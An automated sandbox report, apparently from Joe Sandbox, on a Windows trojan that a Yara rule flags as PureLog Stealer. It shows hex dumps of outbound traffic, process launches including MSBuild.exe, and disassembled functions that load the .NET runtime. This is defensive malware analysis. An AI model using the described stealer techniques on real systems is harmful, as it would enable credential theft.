[SBL]{R+k93$~aiVUd`nI"px5Rh1g4<Q0W;QMK}IRI30<;iBo]G\^c%T}QP)uF>:n]*xxEC?:R rh&kR$:27J;f2:~w\Vl^/?UXBPDG
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: 9f 4b 24 30 ff 36 c1 62 29 36 ed 8e 87 f0 25 5c 73 70 f8 d1 d9 9d 0c a7 93 3f 18 2e 1f 70 f6 30 9d 97 03 be 93 eb 87 6b e2 7e 9c 30 53 26 76 df cd 37 fe 85 3a bd 16 ab b7 3e c1 4b 34 89 f4 d5 e3 a3 b1 27 b3 ef 61 81 ef 8f 3a f3 40 20 51 53 d9 27 4b ab ae d4 08 f1 1f 5e 75 fb a1 58 f7 c0 31 22 30 dc 9f 4a fc d2 1f 44 a5 40 58 b4 a0 e8 c8 e7 a0 a2 cf 81 03 9f 54 b4 6f af fc e9 ec dc 99 3e ab 00 2a 54 21 8d 05 e2 f3 7f b4 3c 17 b5 7b 92 90 42 3d d2 57 6b 5c aa 17 32 91 b8 d0 59 6e eb 5d b3 11 b8 fe c5 ce eb d9 35 e0 53 5c f7 38 61 eb c2 5b 61 a1 24 03 1e 74 ee 70 78 c3 67 f4 2f 49 5b bb 14 ed bd 10 da e1 99 99 f9 b5 be 1f bb 84 83 9f de fe eb 7f 3c 03 c9 50 f2 ca 0d 08 ad 28 9f 10 6b 25 d6 1d e2 06 3a b7 44 59 3d 8d f0 ee 40 72 ee ad 90 7e 29 c4 59 57 4a 00 Data Ascii: K$06b)6%\sp?.p0k~0S&v7:>K4'a:@ QS'K^uX1"0JD@XTo>*T!<{B=Wk\2Yn]5S\8a[a$tpxg/I[<P(k%:DY=@r~)YWJ
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: 67 93 d5 b6 33 71 3e 3d 28 58 1d 48 97 6c 49 95 30 67 e6 bb 70 aa 3d 88 c7 cb 3b ee 88 e6 d5 9f 19 8e 8b 49 be 57 b2 9c fd e0 c8 f9 d7 e7 1a 41 20 1c 04 07 7b 40 97 e2 73 b3 10 7b a0 e3 4f ae 3b 1c 71 47 80 76 38 c6 25 2d 15 16 a0 f9 b4 e9 61 42 df a3 88 55 a8 35 aa 9c 41 72 a8 e8 e6 4d 5d 5b da f6 dd 71 09 f0 92 81 7e 2d 8f 1f 24 1f 2a 05 ed f1 64 76 12 20 a4 91 41 28 f8 cb 2e 73 50 8e 39 36 1d 21 c5 9c b3 50 f2 fc 59 1f 8d 1d ae 65 6f af 65 0a c8 b0 1c 68 34 b6 f3 c5 ad ef d8 63 00 ff 6e 38 fc 95 e5 6b e0 f3 df c3 c2 49 40 90 21 b7 31 83 dc 9b 10 33 e0 b6 15 2f 70 0d c2 00 41 28 82 b9 d1 9b 93 ae 13 64 ae 00 e8 13 fc 86 e7 5c e1 fd e8 5b b5 cc f4 bf 20 b0 35 8f 74 dc 08 d1 95 4a 47 88 fa 61 14 1c cd 7c 7f ab 44 20 d4 7a fa 9a f5 b3 17 39 c1 a6 42 95 6b Data Ascii: g3q>=(XHlI0gp=;IWA {@s{O;qGv8%-aBU5ArM][q~-$*dv A(.sP96!PYeoeh4cn8kI@!13/pA(d\[ 5tJGa\|D z9Bk
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: ab 63 3a 15 15 a6 ea 81 56 b2 ed 1e d6 30 ce af f4 de 4a 36 d8 dd 66 88 b6 63 ea 61 05 00 9b 13 f7 00 c1 be ea 59 3e f8 a4 45 28 f6 4b f2 36 55 ef e9 3b c5 a0 ce 15 45 35 9d 85 58 52 9c 86 6f 84 a3 23 d5 11 05 28 6a 94 c4 f9 ac 12 74 97 c4 c7 c6 3a ca 1d 54 e3 df 84 fb 8c 52 13 11 30 dd 47 c5 86 c1 91 98 28 fb e9 9a fd 47 fb 4e 84 ca 0f 65 96 60 27 df a3 cc d3 0d ac f0 b9 c5 02 6f 99 d2 0e 35 b1 04 57 00 cb 98 b9 7d 35 3b 48 35 35 67 8e af 6f 21 91 15 f6 8d 52 87 e7 6a 76 67 e3 17 49 31 14 d7 2d fc 76 1d 2b e0 38 30 18 c7 08 14 ac ad c5 40 e0 72 f8 80 93 22 b4 b2 87 c9 e2 2d 16 0d 6c cc 5c f9 6b fd d4 b9 c6 bb dc 3f 0e 6b c5 86 17 7e 36 f3 d4 ac 56 eb f9 68 82 89 1c f8 c4 1e 68 b4 2a b2 88 09 cb 64 a5 00 db ae 77 98 c3 50 a6 e1 1a 5e 08 e2 15 be d8 63 da Data Ascii: c:V0J6fcaY>E(K6U;E5XRo#(jt:TR0G(GNe`'o5W}5;H55go!RjvgI1-v+80@r"-l\k?k~6Vhh*dwP^c
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: 70 f7 30 24 76 d0 56 7e 3a 6b f0 be ff 64 54 58 34 3b b0 d1 13 55 78 1c 3a d1 8e 66 49 b5 cc c9 34 37 35 dc e8 f8 65 c9 6c f4 90 25 39 e1 b2 ee 27 8e 8b 51 1b a2 da 85 9a 2d 68 80 79 65 f5 a3 48 85 66 8a fb d6 07 d3 55 4e 62 88 83 39 5e 5d d6 5a b2 d6 b3 88 88 47 8a f3 bf 19 50 f7 9f 86 e8 b9 c7 d5 0b 47 48 ae f2 86 65 a6 ec f6 e1 d5 1f c4 5f 3f 53 e5 0c ac 29 78 7e e9 01 d8 7c 90 25 1a a2 26 ab 14 f9 be ff c0 ae 70 1b d2 85 2f a6 15 1c 9e 11 82 18 b6 ab 3b 7d da f0 81 f0 27 de c5 ce 6e c8 29 e7 bb 7d 4f d7 ee 7e ed 94 e9 b9 79 87 7c 70 79 89 0e 9a f9 f9 0c 0d e4 ef 45 c5 66 77 92 51 4c 57 a6 db 87 47 ab 4d 74 03 aa ca 9f 0f 13 ed cb 1f d0 8d 80 82 87 f0 19 4f 24 ca 79 41 7c 29 4c 4b 8e 32 dd 5d 5d 26 91 39 2d 7f da ad f4 a7 99 19 a8 f9 a0 4a 88 d8 91 f9 Data Ascii: p0$vV~:kdTX4;Ux:fI475el%9'Q-hyeHfUNb9^]ZGPGHe_?S)x~\|%&p/;}'n)}O~y\|pyEfwQLWGMtO$yA\|)LK2]]&9-J
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: 3e d7 8e a4 93 c2 bb 21 7a d1 9f c7 9c df 44 c6 d3 3c 7d 10 18 0c 60 4f 3d b0 d6 82 00 c6 cb b2 68 40 9b 06 8c 4a 5e df c8 22 4d 3a 52 9f 6e 3d 4f e3 4d 50 e7 73 a0 e2 39 1a ac 35 6e f7 f9 3d fd e3 cd 37 02 95 fd 37 74 ac de dd c9 84 fe c6 c8 cc d7 1b a2 df 8c 84 ff dd 92 f8 ef 20 a2 a7 f2 3c 1e dd 24 02 de 47 51 33 e9 8c 0b 7c f0 53 84 df 3d 14 38 5d 8e f6 59 da 81 29 10 5b 9d 74 c6 41 9e 92 07 77 94 38 5c 50 df 51 27 c2 56 6b 5e cc 3d 18 13 2b 8b 47 f1 02 31 94 10 4a 77 29 3b 71 e4 ae a5 0c be 3a f0 18 c4 51 37 77 63 3e aa 0e ff f2 ab 3a dc d6 c1 60 fe 8f a1 c1 ea 73 89 72 b9 1c 42 2e 23 07 19 2d 0a 5e 50 b2 f3 6f 70 bc 45 37 3e b9 a1 e0 81 97 59 ba 57 2e 83 5e 11 4e 22 3f 78 ff 9f 0a 92 7e 5c 1b 94 4b 80 02 44 18 6f ea b8 ba 18 94 21 61 dd 17 b0 b3 41 Data Ascii: >!zD<}`O=h@J^"M:Rn=OMPs95n=77t <$GQ3\|S=8]Y)[tAw8\PQ'Vk^=+G1Jw);q:Q7wc>:`srB.#-^PopE7>YW.^N"?x~\KDo!aA
2024-05-24 08:26:13 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 08:26:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9q3ari1bglbmbvpuleg293vf08; expires=Tue, 17-Sep-2024 02:12:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMm2yYhZW8EJlQERe2NouHdfnHxpI8PmfTFEDbfDgwiaNbVtPPmWCuBDPYb8tX873OWHN7nj5cAXEiOxXRl%2BrPHXbkyTkKua5sUZ5bwERN0okuwIqjV9Zmi17B0mF4rb%2FE1XYe5DKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888be63e1b764251-EWR alt-svc: h3=":443"; ma=86400

Target ID:	0
Start time:	04:25:59
Start date:	24/05/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe"
Imagebase:	0x3f0000
File size:	4'779'216 bytes
MD5 hash:	99BBA7A8FB2A5F15924D1673CFE3A72B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:26:00
Start date:	24/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
Imagebase:	0xaf0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.1%
Dynamic/Decrypted Code Coverage:	7.3%
Signature Coverage:	8.7%
Total number of Nodes:	1320
Total number of Limit Nodes:	52

Executed Functions

Function 6CEBB6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEBB73F
VariantInit.OLEAUT32(?), ref: 6CEBB748
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBB7BE
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBB7F5
VariantClear.OLEAUT32(?), ref: 6CEBB801

Part of subcall function 6CEBC850: VariantInit.OLEAUT32(?), ref: 6CEBC88F
Part of subcall function 6CEBC850: VariantInit.OLEAUT32(?), ref: 6CEBC895
Part of subcall function 6CEBC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC8A0
Part of subcall function 6CEBC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEBC8D5
Part of subcall function 6CEBC850: VariantClear.OLEAUT32(?), ref: 6CEBC8E1

VariantClear.OLEAUT32(?), ref: 6CEBBA15
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBBE90
VariantClear.OLEAUT32(?), ref: 6CEBBEA3
VariantClear.OLEAUT32(?), ref: 6CEBBEA9

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: d6fe2103aa0cc1344b3375f359be5601225c3ffab22c0f36615494a7efdec51d
Instruction ID: dcf8d586036ba823c21b15a05822756f109dbf0e3c965eea424c18bfa9663bcf
Opcode Fuzzy Hash: d6fe2103aa0cc1344b3375f359be5601225c3ffab22c0f36615494a7efdec51d
Instruction Fuzzy Hash: F8526C71D00218DFCB11DFA8C980BEEBBB5BF89318F258199E509AB751DB70A945CF90

Function 06EE0EB3 Relevance: 29.6, Strings: 23, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Guq, xrefs: 06EE1243
p<]q, xrefs: 06EE1142
HERE, xrefs: 06EE1086
HERE, xrefs: 06EE0F6F
HERE, xrefs: 06EE12EC
LOOK, xrefs: 06EE12E7
LOOK, xrefs: 06EE1081
LOOK, xrefs: 06EE0F6A
Guq, xrefs: 06EE1923
HERE, xrefs: 06EE1592
LOOK, xrefs: 06EE19EB
p<]q, xrefs: 06EE1177
p<]q, xrefs: 06EE112C
Guq, xrefs: 06EE14CA
HERE, xrefs: 06EE1AA4
p<]q, xrefs: 06EE118D
LOOK, xrefs: 06EE1A9F
LOOK, xrefs: 06EE17E4
Guq, xrefs: 06EE16D2
LOOK, xrefs: 06EE158D
HERE, xrefs: 06EE17E9
HERE, xrefs: 06EE19F0
Guq, xrefs: 06EE1CCD

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<]q$p<]q$p<]q$p<]q$Guq$Guq$Guq$Guq$Guq
API String ID: 0-3029792773
Opcode ID: 0e7291bb6d892394ff4c99e63c6a2919b8f2d90e3beebb104c5b3f5da52f8f22
Instruction ID: 015bcc5dd29a357205daf8c718fc83251bb6a109f68bf913d58665682988d91a
Opcode Fuzzy Hash: 0e7291bb6d892394ff4c99e63c6a2919b8f2d90e3beebb104c5b3f5da52f8f22
Instruction Fuzzy Hash: 6D829274E402298FDBA4DF68C998BD9B7B1AF48310F1481E9D40DAB365DB34AE85CF50

Function 6CEAB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,67D4BDE6), ref: 6CEAB711
LoadLibraryW.KERNEL32(mscoree.dll), ref: 6CEAB71C
GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6CEAB730
__cftoe.LIBCMT ref: 6CEAB870
GetModuleHandleW.KERNEL32(?), ref: 6CEAB88B
GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6CEAB8D7

Strings

CLRCreateInstance, xrefs: 6CEAB72A
mscoree.dll, xrefs: 6CEAB70C, 6CEAB717
v4.0.30319, xrefs: 6CEAB767

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad__cftoe
String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
API String ID: 1275574042-506955582
Opcode ID: 091ab1abd1e3aef161ccdde4c41fab1e09515550295767ba7394f042a1365c3c
Instruction ID: 5d48b2d7bc32abf8bd60ba3dd8290d4d035738d3830c944ee038fe84d86b6d66
Opcode Fuzzy Hash: 091ab1abd1e3aef161ccdde4c41fab1e09515550295767ba7394f042a1365c3c
Instruction Fuzzy Hash: C4915871D042899FCB04DFE8C8809AEBBB5FF49314F24866CE159EB750D734A906CB55

Function 06EE26F8 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7db6841bc0038b4e0c101beb822ffe8a4989ffea5abdbb20734d6ec129b363d0
Instruction ID: b91a33a56310acba7d900444601117fcaeb8fd8ec8c7f8752ef45d9ab5f3ea00
Opcode Fuzzy Hash: 7db6841bc0038b4e0c101beb822ffe8a4989ffea5abdbb20734d6ec129b363d0
Instruction Fuzzy Hash: 9532A074E012288FDB64DFA9C880BDDBBB2AF89300F1095AAD509B7394DB305E81CF51

Function 02A88038 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 398bba4146dfb0df2d801830c60732a9c70f1d88e02744fe160dbfcc83ff67e9
Instruction ID: e918ce5f1beeb74a6551a884e459d34f43e5bf9c3781023a6dbcc5c9d3df54f7
Opcode Fuzzy Hash: 398bba4146dfb0df2d801830c60732a9c70f1d88e02744fe160dbfcc83ff67e9
Instruction Fuzzy Hash: 0F22CA74A002288FDB64DF69CD94BDDBBB6AF89300F1080E9990DA7365DB345E85CF91

Function 02A88CD8 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38b57784d4c5cddf620ec5264986e0b6e2479ba7d8e8e077a0b01ecba0d3d09c
Instruction ID: 6af317cf7ec24d04e1cd476bb934074445e2799fb963c1799e3e892e2446cc67
Opcode Fuzzy Hash: 38b57784d4c5cddf620ec5264986e0b6e2479ba7d8e8e077a0b01ecba0d3d09c
Instruction Fuzzy Hash: D6125B74E01229CFDB64DF69C994BADBBB2BF89300F1081AAD40DA7365DB305A85CF51

Function 06EE26DB Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4e75bd5c98b1be71f2a0c226e09d84ecfa5d04c69f4c0182aebc4960a99d5d
Instruction ID: fb9069e646c67e710c650e5a22ea960ced64fc78f65a62e68e794282fcf26509
Opcode Fuzzy Hash: ba4e75bd5c98b1be71f2a0c226e09d84ecfa5d04c69f4c0182aebc4960a99d5d
Instruction Fuzzy Hash: D991E774E012189FDB68DFAAC880BDDBBB2BF89300F1481AAD51DA7351DB305A81CF51

Function 6CEB9357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB84BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB84D2
SafeArrayGetElement.OLEAUT32 ref: 6CEB850A
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB94C1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB94D4
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEB950C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB97A4
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB97B7
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEB97F2

Part of subcall function 6CEB3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3B71
Part of subcall function 6CEB3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3B83

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB9D5F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB9D72
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEB9DAF

Part of subcall function 6CEB3A90: SafeArrayDestroy.OLEAUT32(?), ref: 6CEB3BCF

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEBA1BC
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEBA1CF
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CEBA20C
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Strings

A, xrefs: 6CEBAD44

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: A
API String ID: 959723449-3554254475
Opcode ID: e8275036f9c649a00582d3de39d40bd8dbc287fcb93b897cf9698b54c7b2b2b4
Instruction ID: 6d6916518baba1cc994b2a60778b6da37f86ea76e1566bbc63e106ba44ef944a
Opcode Fuzzy Hash: e8275036f9c649a00582d3de39d40bd8dbc287fcb93b897cf9698b54c7b2b2b4
Instruction Fuzzy Hash: 4323A275A012059FDB00DFA4C984FED77B9AF49308F248198EA09BF796DB70E985CB50

Function 6CEB2970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB29F6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB2A08
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB2A2F
VariantInit.OLEAUT32(?), ref: 6CEB2ABB
VariantInit.OLEAUT32(?), ref: 6CEB2B3F
VariantClear.OLEAUT32(?), ref: 6CEB2C04
VariantClear.OLEAUT32(?), ref: 6CEB2C0B
VariantClear.OLEAUT32(?), ref: 6CEB2C12
VariantClear.OLEAUT32(?), ref: 6CEB2C96
VariantClear.OLEAUT32(?), ref: 6CEB2C9D
VariantClear.OLEAUT32(?), ref: 6CEB2CD6
VariantClear.OLEAUT32(?), ref: 6CEB2CDD
VariantClear.OLEAUT32(?), ref: 6CEB2CE4
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB2D1B
VariantClear.OLEAUT32(?), ref: 6CEB2D45
VariantClear.OLEAUT32(?), ref: 6CEB2D4C
VariantClear.OLEAUT32(?), ref: 6CEB2D53

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
String ID:
API String ID: 214056513-0
Opcode ID: 4378f71d5069ab10c2ee52263a2836a759877ce48c90326dc7d892e92dd9c5a5
Instruction ID: a73f69599859a441c2314ce8daf32448f1838020a69082cf6254b3eb21e5a1e1
Opcode Fuzzy Hash: 4378f71d5069ab10c2ee52263a2836a759877ce48c90326dc7d892e92dd9c5a5
Instruction Fuzzy Hash: 55C159716083419FD700CFA8C888A6ABBF9AFD9308F20895DF695DB660C675E845CB52

Function 6CEAAF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEAAF75
VariantInit.OLEAUT32(?), ref: 6CEAAF7C
VariantInit.OLEAUT32(?), ref: 6CEAAF83
VariantCopy.OLEAUT32(?,?), ref: 6CEAB00D
VariantClear.OLEAUT32(?), ref: 6CEAB027
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEAB19C
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAB1AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 6CEAB1C5
_memmove.LIBCMT ref: 6CEAB1E6
SafeArrayUnaccessData.OLEAUT32(?), ref: 6CEAB1EF
VariantClear.OLEAUT32(?), ref: 6CEAB237
VariantClear.OLEAUT32(?), ref: 6CEAB23E
VariantClear.OLEAUT32(?), ref: 6CEAB245
VariantClear.OLEAUT32(?), ref: 6CEAB29D
VariantClear.OLEAUT32(?), ref: 6CEAB2A4
VariantClear.OLEAUT32(?), ref: 6CEAB2AB

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

